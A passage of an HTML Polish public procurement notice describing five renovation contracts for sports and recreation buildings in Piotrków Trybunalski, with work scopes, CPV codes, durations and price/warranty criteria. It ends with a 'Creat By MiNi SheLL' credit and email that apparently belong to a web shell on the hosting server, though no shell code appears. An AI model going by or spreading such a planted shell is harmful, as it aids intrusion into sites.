- przed przystąpieniem do przetargu należy dokonać wizji lokalnej obiektu 
w miejscu realizacji zamówienia;
- roboty winny być prowadzone zgodnie z Prawem Budowlanym i przez  osoby, które posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w szczególności dla kierownika robót w zakresie robót konstrukcyjno-budowlanych posiadające aktualne zaświadczenie z Okręgowej Izby Inżynierów Budownictwa;
- podczas realizacji robót Wykonawca będzie przestrzegać przepisów dotyczących bezpieczeństwa i higieny pracy zgodnie z  R M B i P M B /Dz.U Nr. 13 z dnia 14.04.72/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.40.00.00-1, 45.43.00.00-0, 45.10.00.00-8, 45.42.10.00-4, 45.43.21.00-5, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> REMONT  OBIEKTU  CENTRUM  REKREACYJNEGO  W  PIOTRKOWIE  TRYBUNALSKIM  PRZY  UL. BELZACKIEJ 108/110.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Opis przedmiotu zamówienia: 
a)	Remont obiektu  Centrum Rekreacyjnego w Piotrkowie Trybunalskim przy        ul. Belzackiej 108/110.
- Roboty tynkarskie,
- Roboty przygotowawcze,
- Roboty malarskie,
- Roboty związane z wymiana wykładziny PCV,
- Wymiana skrzydeł drzwiowych,
- Wymiana osprzętu instalacji elektrycznych,
- Wymiana obróbek blacharskich,
- Pokrycie dachu papą termozgrzewalną,
- Roboty porządkowe.

b) Roboty remontowe zabudowy grzejników na sali gimnastycznej.
- Demontaż starej zabudowy grzejników,
- Malowanie konstrukcji wsporczej,
- Roboty związane z montażem drabinek i zabudową boków grzejników,
- Roboty porządkowe.
II. Pozostałe informacje dotyczące przedmiotu zamówienia:
1.   Wykonawca udzieli minimum 36 miesięcy gwarancji na wykonany przedmiot zamówienia.
2.   Zamawiający wymaga należytej staranności przy realizacji niniejszego  zamówienia.
3. Szczegółowy opis przedmiotu zamówienia  podano w Przedmiarach i Specyfikacjach  Technicznych Wykonania i Odbioru Robót Budowlanych, które stanowią załączniki do SIWZ.
4.  Wykonawca, z którym zostanie podpisana umowa dostarczy do  dnia podpisania umowy Kosztorys Ofertowy  na remont obiektu  Centrum Rekreacyjnego w Piotrkowie Trybunalskim przy  ul. Belzackiej 108/110 i  roboty remontowe zabudowy grzejników na sali gimnastycznej, zgodny z ofertą przedstawioną do przetargu. Wymaganą metodą kalkulacji ceny za roboty budowlane jest metoda uproszczona. Na końcu Kosztorysu Ofertowego należy doliczyć podatek od towarów i usług VAT.
5.  WYMAGANIA OGÓLNE WYKONANIA ROBÓT:
- Zamówienie  należy  wykonać  wg  Przedmiarów i Specyfikacji  Technicznych Wykonania i Odbioru Robót Budowlanych, a wszystkie materiały użyte do budowy muszą posiadać: 
a. Certyfikat na znak bezpieczeństwa wykazując, że zapewniono zgodność z kryteriami właściwych przepisów i dokumentów technicznych,
b. Deklarację zgodności lub certyfikat zgodności z: Polską Normą lub, Aprobatą techniczną w przypadku wyrobów, dla których nie ustanowiono Polskiej Normy, jeżeli nie są objęte certyfikacją;
- przed przystąpieniem do przetargu należy dokonać wizji lokalnej obiektu 
w miejscu realizacji zamówienia;
- roboty winny być prowadzone zgodnie z Prawem Budowlanym i przez  osoby, które posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w szczególności dla kierownika robót w zakresie robót konstrukcyjno-budowlanych posiadające aktualne zaświadczenie z Okręgowej Izby Inżynierów Budownictwa;
- podczas realizacji robót Wykonawca będzie przestrzegać przepisów dotyczących bezpieczeństwa i higieny pracy zgodnie z  R M B i P M B /Dz.U Nr. 13 z dnia 14.04.72/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.40.00.00-1, 45.45.30.00-7, 45.00.00.00-7, 45.26.12.10-9, 45.42.10.00-4, 45.43.21.00-5, 45.41.00.00-4, 45.26.23.00-4, 45.23.32.52-0, 45.31.00.00-3, 44.22.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> REMONT  POMIESZCZEŃ  ZNAJDUJĄCYCH  SIĘ  W  BUDYNKU  STADIONU  MIEJSKIEGO  W  PIOTRKOWIE  TRYBUNALSKIM  PRZY  UL. ŻWIRKI 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.Opis przedmiotu zamówienia: 
Roboty remontowe pomieszczeń po pożarze znajdujących  się  w  budynku  Stadionu  Miejskiego  w  Piotrkowie  Trybunalskim  przy  ul. Żwirki 6
- Rozebranie posadzki z paneli podłogowych,
- Skucie tynków,
- Demontaż drzwi i ościeżnic,
- Demontaż okna z pcv,
- Wymiana instalacji elektrycznej,
- Uzupełnienie tynków cementowo-wapiennych,
- Gruntowanie ścian i sufitów,
- Zbrojenie ścian i sufitów siatką Do dociepleń,
- Gładzie gipsowe,
- Malowanie pomieszczeń
- Montaż stolarki okiennej i drzwiowej,
- Ułożenie posadzki z paneli podłogowych,
- Wymiana grzejników,
- Roboty porządkowe
II. Pozostałe informacje dotyczące przedmiotu zamówienia:
1.   Wykonawca udzieli minimum 36 miesięcy gwarancji na wykonany przedmiot zamówienia.
2.   Zamawiający wymaga należytej staranności przy realizacji niniejszego  zamówienia.
3. Szczegółowy opis przedmiotu zamówienia  podano w Przedmiarze i Specyfikacji  Technicznej Wykonania i Odbioru Robót Budowlanych, które stanowią załączniki do SIWZ.
4.  Wykonawca, z którym zostanie podpisana umowa dostarczy do  dnia podpisania umowy Kosztorys Ofertowy zgodny z ofertą przedstawioną do przetargu. Wymaganą metodą kalkulacji ceny za roboty budowlane jest metoda uproszczona. Na końcu Kosztorysu Ofertowego należy doliczyć podatek od towarów i usług VAT.
5.  WYMAGANIA OGÓLNE WYKONANIA ROBÓT:
- Zamówienie  należy  wykonać  wg  Przedmiaru i Specyfikacji  Technicznej Wykonania    i Odbioru Robót Budowlanych, a wszystkie materiały użyte do budowy muszą posiadać: 
a. Certyfikat na znak bezpieczeństwa wykazując, że zapewniono zgodność z kryteriami właściwych przepisów i dokumentów technicznych,
b. Deklarację zgodności lub certyfikat zgodności z: Polską Normą lub, Aprobatą techniczną w przypadku wyrobów, dla których nie ustanowiono Polskiej Normy, jeżeli nie są objęte certyfikacją;
- przed przystąpieniem do przetargu należy dokonać wizji lokalnej obiektu 
w miejscu realizacji zamówienia;
- roboty winny być prowadzone zgodnie z Prawem Budowlanym i przez  osoby, które posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w szczególności dla kierownika robót w zakresie robót konstrukcyjno-budowlanych posiadające aktualne zaświadczenie z Okręgowej Izby Inżynierów Budownictwa;
- podczas realizacji robót Wykonawca będzie przestrzegać przepisów dotyczących bezpieczeństwa i higieny pracy zgodnie z  R M B i P M B /Dz.U Nr. 13 z dnia 14.04.72/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.40.00.00-1, 45.45.30.00-7, 45.10.00.00-8, 31.52.41.20-2, 44.22.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> REMONT  ELEWACJI    BUDYNKU  POŁOŻONEGO NA TERENIE  KORTÓW  TENISOWYCH / LODOWISKA  MIEJSKIEGO  W  PIOTRKOWIE  TRYBUNALSKIM  PRZY  UL. ŻEROMSKIEGO 22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Opis przedmiotu zamówienia: 
Remont  elewacji    budynku  położonego na terenie  kortów  tenisowych / lodowiska  miejskiego  w  Piotrkowie  Trybunalskim  przy  ul. Żeromskiego 22.
- Wycinkę gałęzi,
- Zabezpieczenie okien i drzwi folią,
- Zabezpieczenie opaski budynku,
- Wykonanie warstwy zbrojącej z siatki na ścianie wraz z tynkiem silikonowym,
- Demontaż i ponowny montaż rur spustowych z blachy powlekanej,
- Demontaż i ponowny montaż elementów zewnętrznych na budynku (oświetlenie, daszek, szyld),
- Roboty porządkowe i wywóz odpadów z terenu budowy.

II. Pozostałe informacje dotyczące przedmiotu zamówienia:
1.   Wykonawca udzieli minimum 36 miesięcy gwarancji na wykonany przedmiot zamówienia.
2.   Zamawiający wymaga należytej staranności przy realizacji niniejszego  zamówienia.
3. Szczegółowy opis przedmiotu zamówienia  podano w Przedmiarze i Specyfikacji  Technicznej Wykonania i Odbioru Robót Budowlanych, które stanowią załączniki do SIWZ.
4.  Wykonawca, z którym zostanie podpisana umowa dostarczy do  dnia podpisania umowy Kosztorys zgodny z ofertą przedstawioną do przetargu. Wymaganą metodą kalkulacji ceny za roboty budowlane jest metoda uproszczona. Na końcu Kosztorysu Ofertowego należy doliczyć podatek od towarów i usług VAT.
5.  WYMAGANIA OGÓLNE WYKONANIA ROBÓT:
- Zamówienie  należy  wykonać  wg  Przedmiaru i Specyfikacji  Technicznej Wykonania    i Odbioru Robót Budowlanych, a wszystkie materiały użyte do budowy muszą posiadać: 
a. Certyfikat na znak bezpieczeństwa wykazując, że zapewniono zgodność z kryteriami właściwych przepisów i dokumentów technicznych,
b. Deklarację zgodności lub certyfikat zgodności z: Polską Normą lub, Aprobatą techniczną w przypadku wyrobów, dla których nie ustanowiono Polskiej Normy, jeżeli nie są objęte certyfikacją;
- przed przystąpieniem do przetargu należy dokonać wizji lokalnej obiektu 
w miejscu realizacji zamówienia;
- roboty winny być prowadzone zgodnie z Prawem Budowlanym i przez  osoby, które posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w szczególności dla kierownika robót w zakresie robót konstrukcyjno-budowlanych posiadające aktualne zaświadczenie z Okręgowej Izby Inżynierów Budownictwa;
- podczas realizacji robót Wykonawca będzie przestrzegać przepisów dotyczących bezpieczeństwa i higieny pracy zgodnie z  R M B i P M B /Dz.U Nr. 13 z dnia 14.04.72/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.40.00.00-1, 45.45.30.00-7, 45.10.00.00-8, 03.45.20.00-3, 45.26.13.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> REMONT  POMIESZCZEŃ  ZNAJDUJĄCYCH  SIĘ  W  BUDYNKU  OŚRODKA  SPORTU I REKREACJI  W PIOTRKOWIE TRYBUNALSKIM  PRZY  AL. 3 MAJA  6B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Opis przedmiotu zamówienia:
a)	remont  pomieszczeń (łazienek)  znajdujących  się  w  budynku  Ośrodka  Sportu i Rekreacji  w  Piotrkowie Trybunalskim  przy  Al. 3 Maja  6B.
- Rozebranie okładziny ściennej i podłogowej z płytek ceramicznych,
- Demontaż urządzeń sanitarnych,
- Wykucie otworów pod poszerzenie drzwi wejściowych,
- Montaż nadproży,
- Wymiana instalacji elektrycznej,
- Wymiana drzwi wraz z ościeżnicami,
- Ułożenie nowych płytek ceramicznych i terakotowych,
- Zabudowy z płyt gipsowo-kartonowych,
- Montaż ścianek systemowych do WC,
- Biały montaż,
- Malowanie.

b)	Roboty remontowe związane z naprawą okien w budynku Ośrodka  Sportu  i Rekreacji  w  Piotrkowie Trybunalskim  przy  Al. 3 Maja  6B
- Roboty przygotowawcze,
- Zakotwienie istniejących okien do podłoża,
- Uszczelnienie bruzd pianką poliuretanową niskoprężną,
- Zaprawienie bruzd i przeszpachlowanie ościeży okiennych,
- Malowanie ościeży,
- Roboty porządkowe.
II. Pozostałe informacje dotyczące przedmiotu zamówienia:
1.   Wykonawca udzieli minimum 36 miesięcy gwarancji na wykonany przedmiot zamówienia.
2.   Zamawiający wymaga należytej staranności przy realizacji niniejszego  zamówienia.
3. Szczegółowy opis przedmiotu zamówienia  podano w Przedmiarach i Specyfikacjach  Technicznych Wykonania i Odbioru Robót Budowlanych, które stanowią załączniki do SIWZ.
4.  Wykonawca, z którym zostanie podpisana umowa dostarczy do  dnia podpisania umowy Kosztorys Ofertowy  na remont  pomieszczeń (łazienek)  znajdujących  się  w  budynku  Ośrodka  Sportu i Rekreacji  w  Piotrkowie Trybunalskim  przy            Al. 3 Maja  6B i roboty remontowe związane z naprawą okien w budynku Ośrodka  Sportu i Rekreacji  w  Piotrkowie Trybunalskim  przy  Al. 3 Maja  6B, zgodny z ofertą przedstawioną do przetargu. Wymaganą metodą kalkulacji ceny za roboty budowlane jest metoda uproszczona. Na końcu Kosztorysu Ofertowego należy doliczyć podatek od towarów i usług VAT.
5.  WYMAGANIA OGÓLNE WYKONANIA ROBÓT:
- Zamówienie  należy  wykonać  wg  Przedmiarów i Specyfikacji  Technicznych Wykonania    i Odbioru Robót Budowlanych, a wszystkie materiały użyte do budowy muszą posiadać: 
a. Certyfikat na znak bezpieczeństwa wykazując, że zapewniono zgodność z kryteriami właściwych przepisów i dokumentów technicznych,
b. Deklarację zgodności lub certyfikat zgodności z: Polską Normą lub, Aprobatą techniczną w przypadku wyrobów, dla których nie ustanowiono Polskiej Normy, jeżeli nie są objęte certyfikacją;
- przed przystąpieniem do przetargu należy dokonać wizji lokalnej obiektu 
w miejscu realizacji zamówienia;
- roboty winny być prowadzone zgodnie z Prawem Budowlanym i przez  osoby, które posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w szczególności dla kierownika robót w zakresie robót konstrukcyjno-budowlanych posiadające aktualne zaświadczenie z Okręgowej Izby Inżynierów Budownictwa;
- podczas realizacji robót Wykonawca będzie przestrzegać przepisów dotyczących bezpieczeństwa i higieny pracy zgodnie z  R M B i P M B /Dz.U Nr. 13 z dnia 14.04.72/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.40.00.00-1, 45.45.30.00-7, 45.10.00.00-8, 31.52.41.20-2, 44.22.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com